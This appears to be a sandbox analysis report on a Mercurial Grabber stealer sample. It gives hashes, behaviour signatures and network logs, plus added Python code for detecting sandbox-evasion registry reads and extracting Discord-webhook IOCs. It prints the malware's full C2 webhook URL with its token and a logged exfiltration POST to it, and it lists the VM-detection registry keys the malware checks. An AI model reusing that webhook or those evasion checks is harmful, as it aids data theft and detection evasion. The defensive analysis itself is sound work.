
Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    05/04/2024, 17:52 UTC

General

  • Target

    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe

  • Size

    41KB

  • MD5

    dab10ca029ce64c3ad251a14e2bf7ebc

  • SHA1

    c1dc121d4a039bf5d4e52e9d9880f279696aa099

  • SHA256

    b83d45a9b4f6cf2a1b5c6752cb8ea0764f2eedc921cdca376dfbfd03f9794aa9

  • SHA512

    3391fde8b09cb64b09214779d3cfe2cbc24f03806f45e4982967fb98560e25a7f0452f4c4de277c22c15847e97087a2f4e9f2795f602692077b4b27caab65f98

  • SSDEEP

    768:OscG4ApfT6aSXpDXswouZkenWTj6KZKfgm3EhdF:9cKfnSXcenWTmF7E7F

Malware Config

Extracted

Family

mercurialgrabber

C2

https://discord.com/api/webhooks/885486535112278036/BRBTU4jW0bXhm99GuJgoVJFldS1nYh0T52UFO926r9sr0koC56EjNkZxoXg2bCOmdY7y

Signatures

  • Mercurial Grabber Stealer

    Mercurial Grabber is an open-source stealer targeting Chrome, Discord and some game clients, as well as generic system information.

  • Looks for VirtualBox Guest Additions in registry (2 TTPs, 1 IoC)
  • Looks for VMWare Tools registry key (2 TTPs, 1 IoC)
  • Checks BIOS information in registry (2 TTPs, 1 IoC)

    BIOS information is often read in order to detect sandboxing environments.

  • Reads user/profile data of web browsers (2 TTPs)

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  • Looks up external IP address via web service (3 IoCs)

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry (3 TTPs, 2 IoCs)

    Disk information is often read in order to detect sandboxing environments.

  • Checks SCSI registry key(s) (3 TTPs, 1 IoC)

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry (2 TTPs, 4 IoCs)
  • Modifies system certificate store (2 TTPs, 5 IoCs)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
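The registry signatures above (VirtualBox Guest Additions, VMware Tools, BIOS, SCSI and disk enumeration) are the classic sandbox-evasion checks, and the useful detection is not any single key read but several of them from one process in quick succession. The following is an added example, not code from the report or from the Mercurial Grabber project: it scores registry-access events (Sysmon event ID 12/13 style, constructed inline) against the commonly queried VM-detection keys. The report does not list the exact keys this sample opened, so the key table and the sample events are assumptions; the threshold is a tuning choice.

```python
import re
from collections import defaultdict

# Registry locations that stealers query to decide whether they are running
# inside a VM or sandbox. These are the usual keys behind the "Looks for
# VirtualBox Guest Additions", "Looks for VMWare Tools", "Checks BIOS
# information", "Checks SCSI registry key(s)" and "Maps connected drives"
# signatures; the report does not list the exact keys this sample opened, so
# treating these paths as the ones it touched is an assumption.
SANDBOX_KEYS = {
    "virtualbox_guest_additions": re.compile(r"\\SOFTWARE\\Oracle\\VirtualBox Guest Additions", re.I),
    "vmware_tools": re.compile(r"\\SOFTWARE\\VMware, Inc\.\\VMware Tools", re.I),
    "bios_info": re.compile(r"\\HARDWARE\\DESCRIPTION\\System\\BIOS", re.I),
    "scsi_identifier": re.compile(r"\\HARDWARE\\DEVICEMAP\\Scsi\\", re.I),
    "disk_enum": re.compile(r"\\SYSTEM\\(?:CurrentControlSet|ControlSet\d{3})\\Services\\Disk\\Enum", re.I),
}

# A single BIOS or disk read is common in legitimate software (inventory agents,
# installers); require several distinct techniques from one process before alerting.
THRESHOLD = 2


def classify_registry_path(path):
    """Return the VM-detection technique a registry path matches, or None."""
    for name, pattern in SANDBOX_KEYS.items():
        if pattern.search(path):
            return name
    return None


def score_processes(events):
    """events: iterable of dicts with 'pid', 'image' and 'path' (a registry key
    opened or queried, e.g. from Sysmon event ID 12/13 or an EDR registry trace).
    Returns {pid: {'image': ..., 'techniques': {...}}} for processes that hit
    at least THRESHOLD distinct techniques."""
    hits = defaultdict(lambda: {"image": None, "techniques": set()})
    for ev in events:
        technique = classify_registry_path(ev["path"])
        if technique is None:
            continue
        hits[ev["pid"]]["image"] = ev["image"]
        hits[ev["pid"]]["techniques"].add(technique)
    return {pid: e for pid, e in hits.items() if len(e["techniques"]) >= THRESHOLD}


# Constructed sample events (not from the report). PID 2584 and the image name
# mirror the sandbox run; the registry paths are the assumed keys from above.
SAMPLE_IMAGE = r"C:\Users\Admin\AppData\Local\Temp\dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe"
SAMPLE_EVENTS = [
    {"pid": 2584, "image": SAMPLE_IMAGE, "path": r"HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions"},
    {"pid": 2584, "image": SAMPLE_IMAGE, "path": r"HKLM\SOFTWARE\VMware, Inc.\VMware Tools"},
    {"pid": 2584, "image": SAMPLE_IMAGE, "path": r"HKLM\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer"},
    {"pid": 2584, "image": SAMPLE_IMAGE,
     "path": r"HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0\Identifier"},
    {"pid": 2584, "image": SAMPLE_IMAGE, "path": r"HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum"},
    # Benign control: one BIOS read by a hypothetical inventory agent stays below THRESHOLD.
    {"pid": 4120, "image": r"C:\Program Files\Inventory\agent.exe",
     "path": r"HKLM\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName"},
    {"pid": 4120, "image": r"C:\Program Files\Inventory\agent.exe",
     "path": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"},
]

if __name__ == "__main__":
    for pid, entry in score_processes(SAMPLE_EVENTS).items():
        print(pid, entry["image"], sorted(entry["techniques"]))
```

Run against a real registry trace, the interesting signal is a process from a user-writable directory (here %TEMP%) touching three or more of these keys within its first second of life; the benign control shows why a single BIOS read should not fire on its own.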

Processes

  • C:\Users\Admin\AppData\Local\Temp\dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe"
    • Looks for VirtualBox Guest Additions in registry
    • Looks for VMWare Tools registry key
    • Checks BIOS information in registry
    • Maps connected drives based on registry
    • Checks SCSI registry key(s)
    • Enumerates system info in registry
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    PID:2584

Network

  • DNS (US)
    ip4.seeip.org
    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    ip4.seeip.org
    IN A
    Response
    ip4.seeip.org
    IN A
    23.128.64.141
  • DNS (US)
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
    Response
  • DNS (US)
    193.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    193.178.17.96.in-addr.arpa
    IN PTR
    Response
    193.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-193.deploy.static.akamaitechnologies.com
  • DNS (US)
    ip-api.com
    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • GET (US)
    http://ip-api.com//json/
    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    Remote address:
    208.95.112.1:80
    Request
    GET //json/ HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Fri, 05 Apr 2024 17:52:52 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 297
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
  • DNS (US)
    discord.com
    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    discord.com
    IN A
    Response
    discord.com
    IN A
    162.159.135.232
    discord.com
    IN A
    162.159.137.232
    discord.com
    IN A
    162.159.138.232
    discord.com
    IN A
    162.159.128.233
    discord.com
    IN A
    162.159.136.232
  • POST (US)
    https://discord.com/api/webhooks/885486535112278036/BRBTU4jW0bXhm99GuJgoVJFldS1nYh0T52UFO926r9sr0koC56EjNkZxoXg2bCOmdY7y
    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    Remote address:
    162.159.135.232:443
    Request
    POST /api/webhooks/885486535112278036/BRBTU4jW0bXhm99GuJgoVJFldS1nYh0T52UFO926r9sr0koC56EjNkZxoXg2bCOmdY7y HTTP/1.1
    Content-Type: application/json
    Host: discord.com
    Content-Length: 447
    Expect: 100-continue
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Date: Fri, 05 Apr 2024 17:52:52 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: keep-alive
    set-cookie: __dcfduid=5349a0dcf37511eea987965b7ae05e8c; Expires=Wed, 04-Apr-2029 17:52:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1712339574
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OyRHcGn4we5FB%2FeCvFU03x6z1WjM1DjixdVsyDKkE9WoZtFv%2BtytrbOz6giIciWKtBu5VMUdKYVLusa256tck3aSHZ37dE98U94mQaGyWOqPFKizVbfVVDVTVB2E"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=5349a0dcf37511eea987965b7ae05e8ce1821afbef86184e0b98eabd23a8b9772bb759ca04a61b2670a47f785933a4c2; Expires=Wed, 04-Apr-2029 17:52:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=22ae3af08e8746faed81dfe470f9bad61b2a49f9-1712339572; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=GtWxH54ozWFThQgc6k5l4AhZ7TEuB.vFVtxjUkKMWNA-1712339572957-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 86fb64fa1da8414c-LHR
  • DNS (US)
    141.64.128.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    141.64.128.23.in-addr.arpa
    IN PTR
    Response
  • DNS (US)
    4.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    4.159.190.20.in-addr.arpa
    IN PTR
    Response
  • DNS (US)
    1.112.95.208.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    1.112.95.208.in-addr.arpa
    IN PTR
    Response
    1.112.95.208.in-addr.arpa
    IN PTR
    ip-api.com
  • DNS (US)
    232.135.159.162.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    232.135.159.162.in-addr.arpa
    IN PTR
    Response
  • DNS (US)
    50.23.12.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    50.23.12.20.in-addr.arpa
    IN PTR
    Response
  • DNS (US)
    198.187.3.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    198.187.3.20.in-addr.arpa
    IN PTR
    Response
  • DNS (US)
    198.187.3.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    198.187.3.20.in-addr.arpa
    IN PTR
  • DNS (US)
    24.139.73.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    24.139.73.23.in-addr.arpa
    IN PTR
    Response
    24.139.73.23.in-addr.arpa
    IN PTR
    a23-73-139-24.deploy.static.akamaitechnologies.com
  • DNS (US)
    201.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    201.178.17.96.in-addr.arpa
    IN PTR
    Response
    201.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-201.deploy.static.akamaitechnologies.com
  • DNS (US)
    19.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    19.229.111.52.in-addr.arpa
    IN PTR
    Response
  • DNS (US)
    240.221.184.93.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.221.184.93.in-addr.arpa
    IN PTR
    Response
  • DNS (US)
    18.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.173.189.20.in-addr.arpa
    IN PTR
    Response
  • 23.128.64.141:443
    ip4.seeip.org
    tls
    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    sent 728 B (10 packets), received 5.0kB (9 packets)
  • 208.95.112.1:80
    http://ip-api.com//json/
    http
    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    sent 296 B (5 packets), received 606 B (3 packets)

    HTTP Request

    GET http://ip-api.com//json/

    HTTP Response

    200
  • 162.159.135.232:443
    https://discord.com/api/webhooks/885486535112278036/BRBTU4jW0bXhm99GuJgoVJFldS1nYh0T52UFO926r9sr0koC56EjNkZxoXg2bCOmdY7y
    tls, http
    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    sent 1.4kB (9 packets), received 4.9kB (10 packets)

    HTTP Request

    POST https://discord.com/api/webhooks/885486535112278036/BRBTU4jW0bXhm99GuJgoVJFldS1nYh0T52UFO926r9sr0koC56EjNkZxoXg2bCOmdY7y

    HTTP Response

    404
  • 96.16.110.114:80
    http
    1.3kB (3 packets)
  • 8.8.8.8:53
    ip4.seeip.org
    dns
    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    sent 59 B (1 packet), received 75 B (1 packet)

    DNS Request

    ip4.seeip.org

    DNS Response

    23.128.64.141

  • 8.8.8.8:53
    13.86.106.20.in-addr.arpa
    dns
    sent 71 B (1 packet), received 157 B (1 packet)

    DNS Request

    13.86.106.20.in-addr.arpa

  • 8.8.8.8:53
    193.178.17.96.in-addr.arpa
    dns
    sent 72 B (1 packet), received 137 B (1 packet)

    DNS Request

    193.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    ip-api.com
    dns
    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    sent 56 B (1 packet), received 72 B (1 packet)

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

  • 8.8.8.8:53
    discord.com
    dns
    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    sent 57 B (1 packet), received 137 B (1 packet)

    DNS Request

    discord.com

    DNS Response

    162.159.135.232
    162.159.137.232
    162.159.138.232
    162.159.128.233
    162.159.136.232

  • 8.8.8.8:53
    141.64.128.23.in-addr.arpa
    dns
    sent 72 B (1 packet), received 140 B (1 packet)

    DNS Request

    141.64.128.23.in-addr.arpa

  • 8.8.8.8:53
    4.159.190.20.in-addr.arpa
    dns
    sent 71 B (1 packet), received 157 B (1 packet)

    DNS Request

    4.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    1.112.95.208.in-addr.arpa
    dns
    sent 71 B (1 packet), received 95 B (1 packet)

    DNS Request

    1.112.95.208.in-addr.arpa

  • 8.8.8.8:53
    232.135.159.162.in-addr.arpa
    dns
    sent 74 B (1 packet), received 136 B (1 packet)

    DNS Request

    232.135.159.162.in-addr.arpa

  • 8.8.8.8:53
    50.23.12.20.in-addr.arpa
    dns
    sent 70 B (1 packet), received 156 B (1 packet)

    DNS Request

    50.23.12.20.in-addr.arpa

  • 8.8.8.8:53
    198.187.3.20.in-addr.arpa
    dns
    sent 142 B (2 packets), received 157 B (1 packet)

    DNS Request

    198.187.3.20.in-addr.arpa

    DNS Request

    198.187.3.20.in-addr.arpa

  • 8.8.8.8:53
    24.139.73.23.in-addr.arpa
    dns
    sent 71 B (1 packet), received 135 B (1 packet)

    DNS Request

    24.139.73.23.in-addr.arpa

  • 8.8.8.8:53
    201.178.17.96.in-addr.arpa
    dns
    sent 72 B (1 packet), received 137 B (1 packet)

    DNS Request

    201.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    19.229.111.52.in-addr.arpa
    dns
    sent 72 B (1 packet), received 158 B (1 packet)

    DNS Request

    19.229.111.52.in-addr.arpa

  • 8.8.8.8:53
    240.221.184.93.in-addr.arpa
    dns
    sent 73 B (1 packet), received 144 B (1 packet)

    DNS Request

    240.221.184.93.in-addr.arpa

  • 8.8.8.8:53
    18.173.189.20.in-addr.arpa
    dns
    sent 72 B (1 packet), received 158 B (1 packet)

    DNS Request

    18.173.189.20.in-addr.arpa
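The network activity above is the whole stealer in miniature: two external-IP lookups (ip4.seeip.org over TLS, then GET http://ip-api.com//json/) to geotag the victim, followed by a POST of 447 bytes of JSON to the Discord webhook listed under Malware Config. The 404 on that POST is the detail worth recording: Discord returns 404 for a webhook that no longer exists, so the exfil channel was already dead when this run happened. The following is an added example, not code from the report or from Mercurial Grabber, that turns HTTP records like these into IOCs: it recognises the Discord webhook URL shape, splits out the webhook ID and token, decodes the creation time Discord embeds in the ID (a snowflake: the top 42 bits are milliseconds since 2015-01-01 UTC), marks the webhook dead on a 404, flags IP-lookup hosts, and produces defanged strings for a report. The request records are copied from this page; the ip4.seeip.org record is reconstructed from the TLS connection (only the domain is visible), and the extra IP-lookup hostnames beyond the two seen here are an assumption.

```python
import re
from datetime import datetime, timezone

# Discord snowflake IDs embed a creation time: the top 42 bits are milliseconds
# since the Discord epoch (2015-01-01T00:00:00Z).
DISCORD_EPOCH_MS = 1420070400000

# Webhook URL shape: /api/webhooks/<snowflake id>/<token>. The token is the
# only secret; anyone holding the URL can post to the channel.
WEBHOOK_RE = re.compile(
    r"https://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/(?P<id>\d{17,20})/(?P<token>[A-Za-z0-9_-]{50,})"
)

# Public "what is my IP" services that stealers call to geotag the victim.
# The first two appear in this report; the rest are common alternatives (assumption).
IP_LOOKUP_HOSTS = {"ip-api.com", "ip4.seeip.org", "api.ipify.org", "ipinfo.io", "icanhazip.com"}


def snowflake_time(snowflake):
    """UTC creation time encoded in a Discord snowflake (webhook, user, message ...)."""
    ms = (int(snowflake) >> 22) + DISCORD_EPOCH_MS
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc)


def defang(url):
    """Make a URL safe to paste into a ticket or report."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def classify_request(req):
    """req: dict with 'method', 'url' and 'status' (None if no HTTP response was seen).
    Returns an IOC record for C2 / recon traffic, or None for anything else."""
    m = WEBHOOK_RE.search(req["url"])
    if m:
        return {
            "kind": "discord_webhook_c2",
            "webhook_id": m.group("id"),
            "webhook_created": snowflake_time(m.group("id")),
            # Discord answers 404 for a webhook that no longer exists, so a 404
            # on the POST means the exfil channel was already dead when this ran.
            "webhook_alive": req["status"] != 404,
            "token": m.group("token"),
            "defanged": defang(req["url"].split("/api/webhooks/")[0])
            + "/api/webhooks/" + m.group("id") + "/<token>",
        }
    host = re.match(r"https?://([^/:]+)", req["url"]).group(1).lower()
    if host in IP_LOOKUP_HOSTS:
        return {"kind": "ip_lookup", "host": host, "defanged": defang(req["url"])}
    return None


def extract_iocs(requests):
    """Classify every request and keep only the interesting ones."""
    return [c for c in (classify_request(r) for r in requests) if c is not None]


# Requests as recorded in the report above. The two HTTP entries are copied
# verbatim; the ip4.seeip.org entry is reconstructed from the TLS connection
# (only the domain is visible, so method and status are unknown).
REPORT_REQUESTS = [
    {"method": None, "url": "https://ip4.seeip.org/", "status": None},
    {"method": "GET", "url": "http://ip-api.com//json/", "status": 200},
    {"method": "POST",
     "url": "https://discord.com/api/webhooks/885486535112278036/BRBTU4jW0bXhm99GuJgoVJFldS1nYh0T52UFO926r9sr0koC56EjNkZxoXg2bCOmdY7y",
     "status": 404},
]

if __name__ == "__main__":
    for ioc in extract_iocs(REPORT_REQUESTS):
        print(ioc["kind"], ioc["defanged"], ioc.get("webhook_created"), ioc.get("webhook_alive"))
```

Two practical notes. The decoded creation time dates the webhook (here September 2021), which is often a better clue to the campaign's age than the sample's submission date. And because the token is the whole secret, a webhook URL recovered from a sample or a sandbox report is itself sensitive: share the defanged form with the ID and report the live URL to Discord, rather than pasting the token into a ticket.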

MITRE ATT&CK Enterprise v15


Downloads

  • memory/2584-0-0x00000000001C0000-0x00000000001D0000-memory.dmp

    Filesize

    64KB

  • memory/2584-1-0x00007FFA28E60000-0x00007FFA29921000-memory.dmp

    Filesize

    10.8MB

  • memory/2584-2-0x000000001AD90000-0x000000001ADA0000-memory.dmp

    Filesize

    64KB

  • memory/2584-6-0x00007FFA28E60000-0x00007FFA29921000-memory.dmp

    Filesize

    10.8MB
